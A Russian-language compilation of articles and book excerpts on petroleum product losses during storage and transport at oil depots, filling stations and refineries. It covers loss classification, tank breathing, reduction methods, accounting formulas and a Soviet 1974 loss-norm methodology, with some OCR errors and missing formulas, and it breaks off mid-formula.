Нормы потерь нефтепродуктов: виды потерь на нефтебазах

Испарение – одно из негативных качеств нефти и продуктов из нее. Во избежание потерь объема ценного ресурса при устройстве нефтебазы уделяют самое пристальное внимание резервуарам для нефти. Почему? Потому что на них приходится самый большой объем потерь испаряемого материала на всем пути его следования.

Виды потерь

Кроме естественного испарения, существуют и другие виды потерь нефтепродуктов. В зависимости от природы происхождения (причин потерь) их делят на 2 вида.

  1. Эксплуатационные. Связаны с человеческим фактором (небрежность, ошибки персонала, занятого наливом и откачкой) или техническим несовершенством применяемой системы трубопровода. Пример: способ налива бензина для АЗС под уровнем или открытый (во втором случае процент потери будет значительно выше).
  2. Аварийные потери нефтепродуктов возникают вследствие стихийных бедствий, износа резервуарного парка (уменьшения прочности резервуаров), нарушения правил эксплуатации тары для хранения и транспортировки, повреждений трубопровода, цистерн, подключенного оборудования или применяемого транспорта. Условия предупреждения:
    • строгое соблюдение правил выполнения работы по забору на хранение, отливам, перекачке нефтепродукта на нефтебазах, АЗС, перерабатывающих заводах, промыслах;
    • своевременная проверка состояния резервуаров и других объектов системы;
    • регулярная подготовка нефтебаз (АЗС) к весеннему паводку и другим сезонным явлениям;
    • ремонт (плановый, внеплановый) применяемого оборудования и систем трубопровода;
    • следование правилам и техническим инструкциям пользования резервуаров для нефтепродуктов, транспорта для перевозки нефти, трубопроводов.

Классификация эксплуатационных потерь

Эксплуатационные потери нефтепродукта, в свою очередь, делятся на 3 подкласса – количественные/качественные/качественно-количественные. Первые составляют негативные последствия разлива либо утечки.

  1. Разлив – частое негативное следствие переполнения тары для хранения нефти, обычно происходит при отпуске. Причиной разлива может стать как нарушение правил заполнения цистерн, так и выход из строя устройств для налива и слива, контрольных приборов фиксации заполняемого объема.
  2. Утечка – потеря нефтепродуктов при разгерметизации резервуара, корпуса насосной техники, секций трубопровода и т. д.

Качественные возникают в результате смешивания сортов ресурса в одном резервуаре. Сюда же относится обводнение, окисление и загрязнение примесями (образуются в виде отложений после испарения на стенках сосудов или труб).

Причины качественных потерь – нарушение регламента зачистки резервуаров при переходе на другой тип ресурса, частая смена сортов пропускаемой через парк продукции, отсутствие программы качественной подготовки трубопровода для перекачки разных типов материала.

Если говорить коротко, то наиболее частая причина качественных потерь нефтепродуктов при хранении – нарушение условий последовательной транспортировки среды при эксплуатации трубопровода.

Еще один фактор – контакт с кислородом, окислителями. Здесь же повышение температуры ресурса. Возникает вследствие нарушений технологии перекачки или транспортировки. Приводит к окислительной реакции активной части материала (так образуются осадки, смолы, другие отложения).

Качественно-количественные потери нефтепродуктов и нефти при хранении – это фактическое снижение объема ресурса в резервуаре при одновременном ухудшении его качественных показателей. Причиной такого результата часто является испарение под влиянием света, температуры, реакций с кислородом.

Скорость испарения для разных продуктов может отличаться (формируя одну из важных характеристик – испаряемость продукта). Чем она выше, тем большими будут качественно-количественные потери (тем ниже итоговое качество поставляемого на АЗС или нефтебазу материала).

Испарение

Испаряемость легких фракций углеводородов (или сокращенно ЛФУ) во время их хранения является одной из важных характеристик, задающих условия перекачки, залива, слива, хранения и транспортировки. ЛФУ являются главной причиной загрязнения окружения в результате потерь нефтепродуктов от испарения. Согласно данным статистов, в год на одних только АЗС из-за высокой испаряемости ЛФУ теряется более 100 000 тонн бензина.

Собственно, испарение обусловлено специфическими процессами – так называемыми дыханиями резервуара, которые делятся на 2 вида (большое и малое).

  • «Малое дыхание» резервуара – процесс, вызываемый перепадами температуры корпуса – внешней и внутренней. Более всего ему подвержены наземные резервуары. При повышении температуры окружения нагреваются стенки сосуда – тепло передается внутрь и происходит активное испарение летучих составов. Чем выше летучесть, тем быстрее испаряется среда. При этом давление смеси внутри емкости повышается, что запускает регулирующий (дыхательный) клапан. Тот стравливает лишнее давление наружу. Со снижением температуры в темное время суток начинается обратный процесс – температура нефтебазы снаружи падает, внутри емкости формируется недостаток давления (образуется вакуум) и открывается впускной клапан (уже для нагнетания давления).
  • «Большое дыхание» – процесс вытеснения воздуха из резервуара и его попадания в емкость. На «вдохе» пространство резервуара заполняется воздухом из окружения по мере откачки нефтепродукта на АЗС или нефтебазе. На «выдохе» происходит обратная реакция – ресурс заливается в сосуд, постепенно вытесняя паровоздушную смесь в окружающую среду. Объем вытесненного газа при этом примерно равен объему поступающей субстанции. Качественные и количественные потери нефти и нефтепродуктов, формируемые данным процессом, зависят от климатических условий эксплуатации резервуара и частоты проводимых циклов залива-откачки.

Уменьшение потерь нефтепродуктов из-за «дыхания» резервуара

Самый эффективный способ снижения потерь нефтепродукта – использование конструкций подземного размещения (подземных резервуаров). По сравнению с наземным оборудованием, они в гораздо меньшей степени подвергаются воздействию температур, что обеспечивает сокращение теряемого объема («малое дыхание») в 8–10 раз.

Для снижения влияния фактора перепада температур в наземном сосуде следует применять изоляционные покрытия – алюминиевую покраску со слоем эмали. Эффективность теплоизоляции емкости увеличивается на 30–60% при одновременном покрытии поверхности крышки резервуара изнутри и снаружи.

Базовые условия сокращения потерь нефтепродуктов из-за «дыхания» резервуара:

  • Хранение летучих составов в конструкциях с понтоном (плавающей крышей).
  • Максимальное рекомендованное заполнение тары на каждом цикле.
  • Использование тары большой вместительности (практика показала, что в больших резервуарах проценты потерь сокращаются, потому специалисты рекомендуют хранить нефтепродукты в самых вместительных сосудах типоразмерного каталога).
  • Использование диска-отражателя для изменения направления поступающего воздуха на горизонтальное.
  • Устройство газовой обвязки (для резервуарной группы, предназначенной для одного нефтепродукта).

Значительно снижает технологические потери нефтепродуктов из-за «малого дыхания» окраска емкости в светлый тон. Многие современные предприятия добиваются хороших результатов в борьбе с потерями, используя оборудование для конденсации (искусственное охлаждение и поглощение газов сорбентами).

Источник: https://snmash.ru/articles/185-sokrashcheniye-poter-nefteproduktov-v-rezervuarakh.html

Современные проблемы и перспективные направления обеспечения достоверного учета нефтепродуктов

Вопросы учёта и экономии энергетических ресурсов — нефти, нефтепродуктов, газа, тепловой и электрической энергии — являются во многом определяющими для нашей страны, особенно с учётом того, что энергоёмкость российской промышленности существенно превосходит аналогичный показатель развитых зарубежных стран. Процесс энергосбережения будет эффективен только при фактическом учёте энергоресурсов, обеспечить который могут только достоверные измерения при условии их единообразия.

В этих условиях учёт — это необходимое средство для защиты интересов Государства, интересов Потребителя, и защиты права собственников — права на цивилизованную форму разрешения споров о количестве нефтепродуктов при товарных операциях, т.е. на арбитраж.

С точки зрения интересов нефтяной Компании, по нашему мнению, учёт должен удовлетворять двум главным требованиям. Учёт должен обеспечить:

  • «прозрачность» потока нефтепродуктов для себя, с целью оптимизации управления;
  • защиту от законных претензий партнёров по рынку, потребителей и контрольных органов всех уровней.

Учёт и арбитраж базируются на наличии:

  • средств измерений, имеющих нормативную погрешность не только при выпуске с производства, но и в процессе эксплуатации;
  • нормативных документов, которые регламентируют нормы погрешности средств измерений, методики поверки средств измерений, нормы погрешности самих измерений и процедуры измерений (МИ), понятные правила принятия решений о недостачах и излишках;
  • достоверных нормативов технологических потерь нефтепродуктов и потерь от естественной убыли и правил их применения при учётных операциях.

Критерием оценки достоверности учётных операций с нефтепродуктами на НПЗ, нефтебазах и АЗС служит величина небаланса по результатам инвентаризации за месяц.   

Достаточным условием сведения баланса, как правило, является выражение:

     (1)

где: ∆М – фактическая величина небаланса по результатам инвентаризации;∆mдоп – допустимое расхождение между массой книжных остатков нефтепродуктов (остатков по бухгалтерскому учету) МКН и измеренной массой остатков в резервуаре МР на момент сведения материального баланса, кг, определяемое по формуле:

    (2)

где — относительная погрешность измерения массы остатка нефтепродукта в резервуаре, %, определяемая по ГОСТР 8.595-2004г.

Масса книжного остатка нефтепродуктов МКН на момент сведения баланса по нефтепродуктам рассчитывается по формуле:

     (3)

где:  MОНП — масса остатка нефтепродукта на начало периода сведения баланса, кг;М ПР — масса нефтепродукта, поступившего за период сведения баланса, кг;М о — масса нефтепродукта, реализованного за период сведения баланса, кг;

М ПР ТП — масса технологических потерь и естественной убыли нефтепродукта, начисленная в течение периода, за который сводится материальный баланс, кг.

Практика показывает, что фактическая величина небаланса может превышать 10%.

Основными факторами, влияющими на величину небаланса, как показывает анализ выражений 1-3 и подтверждает практика, являются величина погрешности измерений массы при приёме, отпуске и снятии остатков в резервуарах, расчет суммарной погрешности по формуле ГОСТ ГОСТР 8.595-2004г. и достоверность нормативов технологических потерь нефтепродуктов, а так же правильность их применения.

Подходы к оценке погрешности при сведении материального баланса будут представлены на нашем сайте в следующих статьях.

На вопросах нормирования и применения технологических потерь необходимо остановиться более глубоко, поскольку данный аспект является новым для нефтебаз и АЗС после выхода приказов Минэнерго от 13 августа 2009 года №364 и от 1 ноября 2010 года №527/236  об утверждении норм естественной убыли нефтепродуктов при хранении и перевозке.

Источник: http://www.kipenergy.ru/articles/3

ПОИСК

Таблица 2 Потери нефти и нефтепродуктов при хранении на НПЗ

    I. Предельные нормы потерь нефти и нефтепродуктов при хранении,, приёме и отпуске устанавливаются в зависимости от сорта нефтепродуктов и нефти, времени года н климатических зон. [c.56]

    Потери нефтепродуктов при хранении в резервуарах (см. таблицу 3). [c.8]

    Рассмотрим возможные реальные потери нефтепродуктов при хранении и применении и связанное с этим изменение качества. Потери топлив при перекачке, выдаче, хранении, транспортировании и применении происходят при утечках, разливах, а также в результате процессов испарения и загрязнения.

Основная часть нефтепродуктов, особенно легких, теряется в результате процессов испарения. При сливе-наливе нефтепродуктов паровоздушная смесь вытесняется из резервуара в окружаюш ую атмосферу и безвозвратно теряется. Потери при этом достигают у бензинов 0,7, у реактивных и дизельных топлив — 0,18 %.

Потери от вытеснения паров наливаемым топливом [c.41]

    ПОТЕРИ НЕФТИ И НЕФТЕПРОДУКТОВ ПРИ ХРАНЕНИИ И МЕТОДЫ ИХ ЛИКВИДАЦИИ [c.378]

    Уменьшение потерь нефти и нефтепродуктов прп хранении их в резервуарах (выброс паров при больших и малых дыханиях) не только снижает пожарную опасность складов, но и является также важной экономической задачей. [c.170]

    Ниже приводится таблица предельных но,рм потерь нефти и нефтепродуктов при хранении в закрытых ёмкостях на нефтебазах и нефтеперерабатывающих заводах (в килограммах на квадратный метр поверхности испарения в месяц). [c.56]

    Постановлением Госснаба СССР 1977 г. определены нормы естественной убыли нефтепродуктов при хранении, приеме и выдаче. Эти нормы отражают в целом физико-химические свойства и связанные с ними потери нефтепродуктов. В качестве примера на рис.

9 приведена графическая интерпретация этих норм естественной убыли нефтепродуктов. Видно, что максимальные потери будут у автомобильных бензинов при хранении в южной зоне в наземных резервуарах. Эти запланированные потери могут достигать 0,44 вес.

% в год, что на резервуар вместимостью 5000 т составит 15 400 кг. Экономические потери — 8800 руб. (при продажной стоимости бензина 40 коп. за 1 л). В масштабе страны это составит многие миллионы рублей.

При выдаче и приеме потери еще больше возрастут и могут достигнуть 2—3 % от всего грузооборота на всех этапах. [c.44]

    Предельные нормы потерь нефтепродуктов при хранении в резервуарах (в килограммах на 1 поверхности испарения за месяц) [c.58]

    БОРЬБА ЗА СОКРАЩЕНИЕ ПОТЕРЬ НЕФТЕПРОДУКТОВ ПРИ ХРАНЕНИИ, НАЛИВЕ, СЛИВЕ, ПЕРЕКАЧКАХ И ТРАНСПОРТИРОВКЕ В ЦИСТЕРНАХ [c.32]

    Важным условием успешной работы автозаправочной станции является сведение к минимуму потерь нефтепродуктов.

Потери горючего на автозаправочной станции могут быть при его приеме, хранении и отпуске.

Причинами потерь горючего являются неполный слив из железнодорожных и автомобильных цистерн смешение, загрязнение и обводнение испарение, утечки, разбрызгивание и пролив. [c.241]

    Предельные нормы потерь нефтепродуктов при хранении в таре (железных и деревянных бочках) указаны в табл. 12 в процентах от количества хранимого продукта за месяц. [c.59]

    Поэтому каплевидные оболочки называют оболочками равного сопротивления. Каплевидные резервуары экономичны в своей области, т.е. в области повышенного давления, однако монтаж таких резервуаров сложен, требует соответствующих средств механизации для изготовления лепестков двоякой кривизны.

Но в связи с необходимостью сокращения потерь нефтепродуктов при хранении, а резервуары с плавающей крышей или понтоном неэкономичны при малой оборачиваемости, проблема резервуаров повышенного давления, в том числе каплевидных резервуаров, является актуальной и перспективной [25, 26]. [c.

17]

    Масла до поступления в машины проходят множество операций — перекачка по трубопроводам, транспортирование железнодорожным, водным или автомобильным транспортом. Хранение и отпуск.

Каждая из этих операции может сопровождаться количественными потерями и ухудшением свойств нефтепродуктов.

Качественные изменения во многом зависят от технической культуры и подготовленности персонала, доставляющего масла с производства и мест хранения к двигателям машин, а также от технического уровня, оснащенности и состояния средств, применяемых при транспортировании, хранении и использовании нефтепродуктов. Наибольшее влияние на надежность работы автомобилей и мобильной техники оказывают изменения, связанные с образованием смол и осадков, загрязнением масел механическими примесями и обводнением. [c.227]

    Наличие такой простой зависимости позволяет с помощью экспериментальных данных построить номограмму для графического определения потерь нефтепродуктов при хранении в зависимости от изменения упругости их паров. [c.48]

    Все предприятия, где применяли эти нормативы, были разделены на три зоны среднюю, южную и северную.

Нормативы потерь нефти и нефтепродуктов при хранении, приеме, отпуске и транспортировании устанавливали в зависимости от сорта нефтепродукта, времени года и климатической зоны. Нефти и нефтепродукты в соответствии с физико-химическими свойствами были разделены на 10 групп.

Потери нефти и нефтепродуктов при хранении в резервуарных емкостях рассчитывали (по нормативам) в кг/м поверхности резервуаров каждый месяц. [c.15]

    Наименование нефтепродуктов Время хранения в днях Потер по норме и в /к фактически [c.8]

    Одним из основных условий успешной и безаварийной эксплуатации производства является четкая бесперебойная работа всего межцехового и общезаводского транспорта нефтепродуктов, а также резервуарных парков для хранения сырья и готовой продукции.

Транспорт, хранение, налив и слив углеводородов представляют собой трудоемкие операции, выполнение которых неизбежно связано с потерями веществ в окружающую среду. Пары жидких углеводородов тяжелее воздуха.

Они способны продвигаться по направлению движения воздуха и накапливаться в различных углублениях (низинах, колодцах, траншеях), а при определенном соотношении образовывать с воздухом взрывоопасные смеси, которые могут взорваться от источника открытого огня или даже от незначительной искры.

В пасмурные дни содержание вредных газов в воздухе может довольно быстро достичь взрывоопасной концентрации. Особенно опасно образование взрывоопасных концентраций в закрытых помещениях — компрессорных, насосных и т. п. [c.97]

    Предельные нормы потерь нефтепродуктов при хранении, приеме и отпуске установлены в зависимости от сорта нефтепродуктов, времени года и климатических зон. [c.54]

    Нормы потерь нефти и нефтепродуктов при хранении, приеме, отпуске и транспортировке, ЦНИИТЭНефтегаз, Москва, 1965. [c.351]

    В целях упрощения и ускорения определения потерь нефтепродуктов при хранении были сделаны попытки нахождения упругости паров эмпирическим путём. [c.51]

    Вопросы, связанные с мерами по снижению потерь нефтепродуктов при хранении и использовании, являются предметом специальных дисциплин. Однако поскольку основные потери летучих компонентов связаны с хранением в резервуарах, ниже этот случай рассмотрен более подробно.

Наполнение, опорожнение и собственно хранение нефти и нефтепродуктов связаны с вытеснением воздуха, насыщенного углеводородами из резервуара. Эти явления известны под названием дыхание резервуара. Испарение из резервуаров со стационарными крышами по данным одного из НПЗ мощностью 5 млн т/год составляет до 0,27 % (мае.

), а при наливе железнодорожных и автомобильных цистерн — еще до 0,02 % нефтепродуктов от объема переработанной нефти. [c.265]

    Классифицировать потери нефти и нефтепродуктов при хранении можно как количественные и количественно-качественные, когда количественные потери сопровождаются ухудшением качества нефти и нефтепродуктов. [c.209]

    Борьба с потерями нефтепродуктов. Одна из важных задач товарного цеХа — сокращ,ение потерь продуктов при их хранении, перекачке й НаЛиве.

Штерн нефтепродуктов при хранении и перекачке происходят, во-первых, вследствие утечек через неплотности соединений и трубопроводов, а также за счет испарения наиболее легких фракций.

Вторая причина вызывает наибольший процент потерь, приводя к ухудшению качества нефтепродуктов. [c.136]

    Прежде чем нефтепродукты попадут в баки машин, картеры двигателей и трансмиссий, подшипниковые узлы и др., их неоднократно перевозят, перекачивают, перекладывают и длительное время хранят. В ходе этих операций происходят количественные и качественные потери нефтепродуктов.

Наибольшее количество нефтепродуктов теряется от розлива, небрежного обращения, эксплуатации неисправного оборудования. Например, при небрежном обращении с нефтепродуктами и неправильном использовании оборудования для перевозки, хранения и выдачи потери достигают 5—15% в зависимости от вида нефтепродуктов.

В то же время при рациональных схемах движения нефтепродуктов потери их снижаются до 0,5—3%. [c.3]

    К загрязнению воздушного бассейна, приводит испарение нефти и нефтепродуктов. Потери оТ испарения при эксплуатации средств транспорта и хранения обусловливаются свойством нефти и нефтепродуктов-улетучиваться с открытой поверхности и происходят из резервуаров и транспортных емкостей — нефтеналивные судов, железнодорожных и автомобильных цистерн, мелкой тары. [c.8]

    Порйдок применения норм потерь нефтепродуктов при хранении, приеме, отпуске и транспортировке определен Госснабом СССР. [c.80]

    Нормы потерь нефти и нефтепродуктов при хранении, приеме, отпуске и транспортировке. Госплан СССР, приказ № 780, 1964 г. и приказ № 827, 1966 г., М., ЦНИИТЭнеф-тегаз, 1966. [c.66]

    При обычных наиболее распространенных методах хранения и транспортирования нефти и нефтепродуктов потери от испарения очень велики.

Так, например, в средней полосе СССР за сутки из одного резервуара средних размеров испаряется до 70 кГ бензина, причем самых ценных легких фракций.

Это приводит к ухудшению качества бензинов, в том числе к снижению их антидетонацнопньо свойств. [c.195]

    Предельные нормы потерь нефтепродуктов при хранении в мелкой таре (в процентах от количества хранимого продукта за месяц) [c.60]

    Основными источниками атмосферных загрязнений являются организованные выбросы дымовых газов многочисленных трубчатых печей, технологических установок и топок котлов ТЭЦ, выбросы вентиляционных вытяжных систем, газовыделения через неплотности аппаратуры и оборудования, аварийные выбросы, потери нефтепродуктов при хранении и транспорте. [c.497]

    Б у н ч у к В. А. Потери нефти и нефтепродуктов при хранении и транспорте и средства-их сокращения. Транспорт и хранение нефтепродуктов и углеводородного сырья, — М., ЦНИИ1Энефтехии, [c.43]

    Все нефтеперерабатывающие предприятия до 1974 г. определяли товарные потери в соответствии с классификацией и нормативами, введенными в действие Госпланом СССР 10/ХП 1964 г., и изменениями к ним от 4/УП 1966 г. Нормативы были разработаны Государственным комитетом нефтедобывающей промышленности при Госплане СССР.

Они были составлены для потерь а) нефти и нефтепродуктов при хранении в резервуарных емкостях б) мазутов при хранении в земляных нефтеямах в) нефти и нефтепродуктов при отпуске в резервуары, нефтеналивные суда, цистерны и мелкую тару г) нефти и нефтепродуктов при водных перевозках наливом в судах между портами Советского Союза д) нефти и нефтепродуктов через сальниковые уплотнения насосов при перекачке по магистральным трубопроводам. [c.15]

    Методика содержит в себе такж аппараты и приемы, насыщения воздухом и освобождения от газов в строгих условия , а также вносит некоторые уточнения и добавления, касающиеся других сторон вопроса о подготовке вещества.

Данные аппаратура и приемы обладают большой экспериментальной приспособляемостью как на пример, кроме отмеченной возможности определять коэфициенты расширения при высоких температурах, укажем на возможность приспособить аппаратуру к определению потерь в легких нефтепродуктах при хранении, перекачке и т. п. по упругости паров. В этом случае можно иметь возможность вести исследование со всей точностью весового анализа, так как методика позволяет совершенно строго извлекать ампулу с продуктом из аппарата и, если нужно, поместить ее на весы. Отметим еще, что в то время, как определение упругостей паров при высоких температурах по самому существу является сложной в экспериментальном отношении и неходовой работой, та часть методики, которая содержит определение в диапазоне до 100° С и которая является наиболее интересной при обычном круге работ (моторное топливо и т. п.), доступна для всякой, хотя бы и не очень богатой технически лаборатории. ,  [c.50]

    Конструкция кпапана предусматривает высокую герметичность и точность срабатывания затворов давления и вакуума, что позволяет сократить потери легких фракций нефтепродуктов при хранении и уменьшить загрязнение окружающей среды. Контактирующие поверхности тарелок и седел всех затворов имеют специальное тефлоновое покрытие.

Тарелки вакуума и давления крепятся на гибких фторопластовых пластинах. Внутренние полости кпапана не имеют перегородок и горизонтальных полок, что обеспечивает беспрепятственный сток конденсата из полости кпапана внутрь резервуара.

Конструкция и размеры полостей клапана обеспечивают работоспособность клапана при толщине инея на внутренних поверхностях до 5 см. [c.361]

    Анализ причин неудовлетворительной работы и отказов этих устройств показал, что их недостаточная надежность в режиме ожидания (в период между пожарами) обусловлена плохой герметичностью сбрасываемой во время пожара крышки, которая отделяет внутреннюю полость резервуара от пенопровода.

Утечки паровоздушной смеси через неплотности соединения этой крышки приводят к взрывам и пожароопасным ситуациям, а также к непроизводительным потерям нефтепродуктов при хранении.

Легкоплавкие элементы герметизирующего затвора расположены в недоступных для осмотра местах — внутри резервуара с нефтепродуктами, это обусловливает низкий показатель ремонтопригодности (в конструкциях не предусмотрена возможность для проведения плановых профилактических осмотров, проверок и ремонтов).

Опыт эксплуатации показывает, что в результате этого при тушении пожара устройство оказывается в неработоспособном состоянии или недостаточно эффективно вследствие большой инерционности приведения его в действие.

Применение такого устройства возможно лишь при наличии системы пожарной сигнализации, имеющей оборудование, замедляющее включение подачи водного раствора пенообразователя в пеногенератор, для исключения вероятности охлаждения легкоплавких замков герметизирующего затвора потоком жидкости. Использование такого оборудования увеличивает инерционность системы в 5—10 раз. Кроме того при отказе системы автоматики во время пожара нельзя использовать ручное или дистанционное включение. Это существенно снижает надежность работы устройств. [c.203]

Источник: https://www.chem21.info/info/310037/

Классификация потерь нефтепродуктов и пути их сокращения

02 декабря 2015 г.

Все виды потерь нефтепродуктов, которые имеют место при эксплуатации нефтехранилищ и АЗС, можно разделить на две группы: по причинам возникновения и по характеру.

По причинам возникновения различают потери эксплуатационные и аварийные. Эксплуатационные потери имеют место из-за несовершенства применяемых технологий и из-за ошибок персонала.

Например, налив цистерн открытой струей приводит к бблыпим потерям бензина, чем налив под уровень. Поэтому изменение способа налива цистерн с первого на второй позволит уменьшить потери.

Сокращению потерь вследствие ошибок персонала способствуют его высокая квалификация и высокий уровень производственной дисциплины.

  • Причинами аварийных потерь нефтепродуктов являются:
  • 1)   техногенные повреждения трубопроводов, резервуаров, оборудования и транспортных средств;
  • 2)   нарушение правил их технической эксплуатации;
  • 3)   исчерпание прочностного ресурса;
  • 4)   стихийные бедствия.

Сокращения таких видов потерь можно достичь, соблюдая правила производства работ на территории нефтебаз и АЗС, правила технической эксплуатации трубопроводов, резервуаров, оборудования и транспортных средств, осуществляя их своевременные диагностику и ремонт, подготовку объектов нефтебаз и АЗС к весеннему паводку и т.д.

По характеру различают количественные, качественные и количественно-качественные потери. Количественные потери возникают вследствие разлива нефтепродуктов, переливов резервуаров и транспортных средств, утечек, неполного слива нефтепродуктов, а также их уноса со сточными водами.

Разливы возникают при авариях трубопроводов, резервуаров и транспортных средств.

Предотвратить их можно проведением соответствующих профилактических мероприятий (поддержанием в трубопроводах безопасных давлений, сооружением резервуаров, где необходимо, в сейсмостойком исполнении, поддержанием предохранительной арматуры в работоспособном состоянии и т.д.). Уменьшение аварийных потерь нефтепродуктов в случае их возникновения достигается оперативным осуществлением мер по локализации мест аварии и сбору разлившегося продукта.

Переливы резервуаров и транспортных средств происходят из-за ошибок эксплуатационного персонала, а также неисправности контрольно-измерительных приборов (например, датчиков максимального уровня жидкости в емкости).

Причинами утечек являются сквозные локальные повреждения металла на малой площади (свищи), негерметичность трубопроводной арматуры, технологических трубопроводов и насосного оборудования (протечки во фланцах, сальниках, уплотнениях). Эти потери могут быть ограничены регулярными осмотрами оборудования, своевременным применением средств диагностики и выполнением графика профилактических ремонтов.

Неполный слив нефтепродуктов из транспортных средств приводит к тому, что в процессе зачистки (цистерны) или заполнения балластной водой (танкеры) происходит образование нефтезагрязненных вод. Их последующая очистка требует значительных затрат и сопровождается потерей определенной части углеводородной жидкости.

Неумелое удаление подтоварной воды из резервуаров приводит к тому, что в промливневую канализацию попадает часть нефтепродукта. Ограничить эти потери позволяет внимательное отношение персонала к своим обязанностям.

Качественные потери нефтепродуктов обусловлены их обводнением, смешением, окислением и загрязнением.

Причинами обводнения могут быть конденсация паров воды из паровоздушной смеси (ПВС) в ночное время на внутренней поверхности кровли резервуаров, дренирование дождевых и талых вод с поверхности плавающих крыш непосредственно в хранимый продукт, захват подтоварной воды при внутрибазовых перекачках, негерметичность средств парового подогрева нефтепродуктов. Предотвратить обводнение можно, контролируя расход пара на подогрев и соблюдая правила эксплуатации резервуаров с плавающими крышами.

Проблема смешения особенно остра при операциях с нефтепродуктами, которые имеют существенно различные свойства. Смешение происходит в ходе последовательной перекачки нефтепродуктов по трубопроводам, при их приеме в резервуары на остаток другого нефтепродукта, при заполнении емкостей, не подготовленных к приему в соответствии с требованиями ГОСТ.

Чтобы ограничить смешение, необходимо строго придерживаться требований «Норм проектирования…

» по номенклатуре нефтепродуктов, допускаемых к транспортировке по одному трубопроводу, располагать достаточной резервуарной емкостью для раздельного хранения нефтепродуктов, следить за герметичностью запорной арматуры между резервуарами и общими коллекторами и т.д.

Перечень нефтепродуктов, допускаемых к последовательной перекачке по одному трубопроводу

Топливо
1-я группа Автомобильные бензины неэтилированные
2-я группа Автомобильные бензины этилированные
3-я группа Высокооктановые бензины Аи-93, Аи-95
4-я группа Керосин осветительный, топливо для быстроходных дизелей, топливо дизельное
5-я группа Топливо моторное, для среднеоборотных и малооборотных дизелей топливо нефтяное (мазут)
6-я группа Топливо для реактивных двигателей
7-я группа Бензины авиационные этилированные
8-я группа Бензины авиационные неэтилированные, бензинырастворители
Масла
1-я группа Авиационные и для турбореактивных двигателей
2-я группа Турбинные для гидротурбин и судовых газовых турбин, конденсаторные, МТ, МК-6, МК-8, трансформаторные, МС6, МС-8, МС-8П, МК-8п.
3-я группа Веретенное АУ, Аул
4-я группа Трансмиссионные, цилиндровые
5-я группа Автомобильные, автотракторные, индустриальные, компрессорные, судовые, моторные для высокоскоростных механизмов
6-я группа Осевые
7-я группа Дизельные
8~я группа Отработанные

Окисление нефтепродуктов происходит в резервуарах при их контакте с воздухом. Результатом этого является образование смол и органических кислот. Смолообразование протекает тем интенсивнее, чем выше температура хранения, а также чем больше поверхность «зеркала» углеводородной жидкости и объем паровой фазы. Поэтому длительное хранение нефтепродуктов целесообразно осуществлять либо в заглубленных резервуарах, либо в резервуарах с плавающими покрытиями (понтонами, плавающими крышами). В резервуарах типа РВС желательно осуществлять хранение при повышенных взливах.

Загрязнение нефтепродуктов происходит атмосферной пылью, продуктами коррозии трубопроводов и резервуаров, смолами. Пыль всегда присутствует в атмосфере и попадает в резервуары при каждом их «вдохе».

  1. В замкнутом газовом пространстве она постепенно оседает и попадает в углеводородную жидкость.
  2. Продукты коррозии образуются на внутренней поверхности резервуаров и осыпаются при их вибрации.
  3. Загрязнению нефтепродуктов способствуют также их налив в плохо зачищенные емкости, перекачка по загрязненным трубопроводам, несвоевременная зачистка резервуаров от накопившихся осадков.
  4. Основной причиной загрязнения нефтепродуктов, перекачиваемых по магистральным трубопроводам, являются: использование при строительстве и ремонте загрязненных (грунтом) труб, применение при ремонтных работах глиняных тампонов (для отделения мест сварки от полости труб с нефтепродуктом), закачка осадка, извлеченного из резервуаров, в полость трубопроводов.

Для уменьшения загрязнения нефтепродуктов применяют различные фильтры, отстаивание, центрифугирование и т.п. Положительные результаты дает применение внутренних покрытий резервуаров.

К количественно-качественным относят потери нефтепродуктов от испарения, в результате чего не только уменьшается их количество, но и изменяется в худшую сторону качество (уменьшается октановое число бензинов, утяжеляется фракционный состав).

Ниже рассматриваются механизм возникновения и методы расчета потерь нефтепродуктов от испарения, применяемые средства их сокращения, а также методика выбора этих средств.

Источник: http://ros-pipe.ru/clauses/klassifikatsiya-poter-nefteproduktov-i-puti-ikh-so/

Методика по нормированию и учету потерь нефти и нефтепродуктов на нефтеперерабатывающих предприятиях Миннефтехимпрома СССР, от 30 сентября 1974 года

УТВЕРЖДАЮ: Заместитель
Министра Г.Ивановский 30 сентября 1974 года.

Заместитель начальника
Главнефтехимпереработки (Л.Злотников)

Согласовано:

Заместитель начальника
Технического управления (В.Никитин)

Заместитель начальника
Планово-экономического управления (С.

Полоцкий)

Настоящей методикой
регламентируется порядок разработки нормы потерь нефти и
нефтепродуктов по каждой установке в отдельности и по предприятию в
целом и единообразие учета потерь на нефтеперерабатывающих
предприятиях отрасли.

Миннефтехимпром СССР
ежегодно утверждает предприятиям нормы технологических /в том числе
товарных/, возвратных и безвозвратных потерь нефти и нефтепродуктов
/в дельнейшем для краткости — «нормы» или «потери»/.

1.
Порядок разработки унифицированных норм потерь для каждого типа
установки

Как потери нефти и
нефтепродуктов на технологических установках, определяется
величина, на которую сумма веса нефтепродуктов /товарных,
полуфабрикатов, реализуемых отходов/, получаемых на установке из
сырья, не балансируется с весом сырья, т.е. меньше его.

Эти потери
для каждого типа установки унифицированно разрабатываются на основе
изучения типов и мощностей всех действующих технологических
установок, достижений передовых предприятий отрасли, степени
интенсификации и модернизации технологических установок с учетом
проектных норм и фактически достигнутого уровня потерь по каждому
типу технологических установок за последние три года.

При разработке
унифицированных норм учитываются также рекомендации
научно-исследовательских институтов и других организаций,
направленные на снижение потерь нефти и нефтепродуктов на
установках, предприятиях.

При определении типа той
или иной установки учитывается не только основной технологический
процесс установки, а также и те процессы, которые действуют в
комплексе с основными процессами переработки сырья. Например: АТ с
термокрекингом, AT с ЭЛОУ, АВТ со стабилизацией и вторичной
перегонкой бензина и т.д.

Технологические установки
по типам разделяются на основе полученных от предприятий
характеристик установок с кратким описанием основных стадий
процесса. В характеристиках установок, представленных
предприятиями, освещаются следующие вопросы:


полное название технологической установки;


название проектной организации и индекс проекта установки;


основные стадии процесса;


мощность установки, утвержденная и фактическая;


год ввода в эксплуатацию;


объем потерь, предусмотренный проектом в %% к сырью;


фактический объем потерь за предыдущие 3 года;


предлагаемая предприятием норма потерь;


какие коэффициенты к норме потерь предлагаются предприятием.

Для каждого типа
технологической установки, на основе данных, изложенных в
характеристиках, статистическим методом определяется единая норма
потерь.

Нормативные потери на
технологической установке определяются по формуле;

П=С-/Н+Д+О/,

где:
С
— сырье технологической установки /нефть, мазут; масляные,
бензиновые фракции, газы, полуфабрикаты свои, со стороны и
т.д./;

Н
— товарные нефтепродукты /бензин, керосин, дизельное топливо,
масла, кокс, битум, газы и т.д./;

Д
— полуфабрикаты;

О
— реализуемые отходы нефтепродуктов;

П
